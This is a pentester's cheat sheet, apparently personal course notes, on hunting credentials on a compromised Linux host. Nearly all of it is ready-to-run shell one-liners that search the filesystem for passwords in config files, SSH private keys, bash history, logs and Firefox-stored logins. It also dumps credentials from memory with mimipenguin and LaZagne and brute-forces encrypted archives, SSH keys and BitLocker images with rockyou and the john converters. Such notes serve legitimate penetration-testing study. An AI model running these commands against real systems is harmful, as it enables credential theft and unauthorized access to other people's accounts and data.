creds

Credentials hunting on linux

#credentialhunt

Find config files

for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null |grep -v "lib\|fonts\|share\|core"; done

Find credentials in config files

for i in $(find / -name *.cnf 2>/dev/null |grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|passwd\|pass" $i 2>/dev/null |grep -v "\#";done

Find database files

for i in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done

Find notes

find /home/* -type f -name "*.txt" -o ! -name "*.*"

Find scripts

for i in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done

Cronjobs

cat /etc/crontab

ls -la /etc/cron.*/

Find SSH keys

Private keys:

grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

Public keys:

grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

bash history check

tail -n5 /home/*/.bash*

Logs check

for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done

Memory and cache check for credentials

https://github.com/huntergregal/mimipenguin
Lazagne

sudo python2 lazagne.py all

Firefox stored credentials (web credentials)

Tool:

https://github.com/unode/firefox_decrypt
Lazagne.py

Manual:

python3 lazagne.py browsers

ls -l .mozilla/firefox/ | grep default

cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .

Hunt for protected files/data

find protected files

for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

find ssh keys

grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

find for encrypted ssh keys

cat /home/cry0l1t3/.ssh/SSH.private

Cracking

MS office documents - office2john
SSH - ssh2john
PDF - pdf2john
Bitlocker encryption (.vhd) - bitlocker2john

List of all file Extensions

curl -s https://fileinfo.com/filetypes/compressed | html2text | awk '{print tolower($1)}' | grep "\." | tee -a compressed_ext.txt

Cracking OPENSSL archives/files

file gzip.gzip

for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null| tar xz;done

Bitlocker encryption

bit2john -I backup.vhd > backup.hash

grep "bitlocker\$0" backup.hashes > backup.hash

Previouscredential-hunting NextShadow file passwords

Last updated 2 days ago

hashtagCredentials hunting on linux

hashtagHunt for protected files/data

Credentials hunting on linux

Hunt for protected files/data